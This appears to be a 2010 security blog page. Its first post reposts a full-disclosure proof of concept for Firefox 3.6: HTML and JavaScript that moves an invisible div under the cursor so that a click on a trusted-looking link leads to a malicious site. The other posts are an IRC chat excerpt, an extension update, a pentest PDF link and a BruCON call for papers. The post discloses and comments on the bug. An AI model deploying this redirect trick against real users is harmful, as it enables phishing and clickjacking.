Xanda's Blog !~!

Phishing or Clickjacking?

Feb
26

I was about to shutdown my machine and go to sleep but suddenly my RSS reader popping up new feeds.

Here is one thing that made me smile:

Mozilla firefox 3.6 unpatched phishing vulnerability

From: bugsbanned () hushmail com
Date: Wed, 24 Feb 2010 19:29:33 -0300

…Unpatched bug since Mozilla firefox 3.0…

Mozilla “INsecurity team” remember, security through obscurity just
DOESN’T WORK…
Locking down bugzilla advisories even the 2 years old ones is
unnecessary and lame.

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://Maliciouswebsite’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://trustedwebsite”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-size:32px”>http://trusted
website</font></a><br>

</div>
</body>
</html>

For example:

<html>
<body>
<div id=”mydiv”
onmouseover=”document.location=’http://www.wikipedia.org’;”
style=”position:absolute;width:2px;height:2px;background:#FFFFFF;bor
der:0px”></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById(‘mydiv’).style.left=mouseX-1;
document.getElementById(‘mydiv’).style.top=mouseY-1;
}
</script>
<br>
<a href=”http://www.google.com”; onclick=”updatebox(event)”><font
style=”font-family:arial;font-
size:32px”>http://www.google.com</font></a><br>

</div>
</body>
</html>

Source:www exploit-db com

Phishing huh? To me its clickjacking ๐Ÿ™‚

Source: http://seclists.org/fulldisclosure/2010/Feb/434

P/S: Owh ya, NoScript is one of my best friend and he wants to be your best friend to ๐Ÿ˜‰

Mangsa :: salawank

Feb
25
<xanda> salawank: livescore2facebook aku dah cun.. nanti aku release source code.. 
<xanda> salawank: world cup nie.. mesti dapat sambutan nie
<salawank> xanda: nice.. aku usya, nak2 time dia inform chelase kalah
<salawank> hoho
<salawank> xanda: code dlm ruby ke?
<xanda> salawank: asal nye aku code ruby
<xanda> salawank: last last...
<salawank> php
<xanda> salawank: tak.. ruby la.. buat apa nak tuka2?
<salawank> siot
<xanda> HAHAHAHA

XandaForceHTTPS Updated

Feb
25

XandaForceHTTPS updated. Now with Firefox 3.6.* support. Requested by LinuxMalaysia

Read more HERE

Pen Testing the Web With Firefox

Feb
19

Nice write up by Michael โ€œtheprez98โ€ Schearer



Get the PDF file HERE

BruCON 2010: Call for Papers

Feb
17

Call for Papers BruCON.v2 2010: Hacking for B33r
================================

Brussels, Belgium — This is a call for papers and participation for the second BruCON edition, a 2-day Security and Hacking Conference, full of interesting presentations, workshops and security challenges.

BruCON is an open-minded gathering of people discussing computer security, privacy, and information technology. The conference tries to create bridges between the various actors active in computer security world, included but not limited to hackers, security professionals, security communities, non-profit organizations, CERTs, students, law enforcement agencies,…..

The conference will be held in Brussels (24 & 25 September 2010) at The Surfhouse(www.surfhouse.be).

[READ MORE HERE]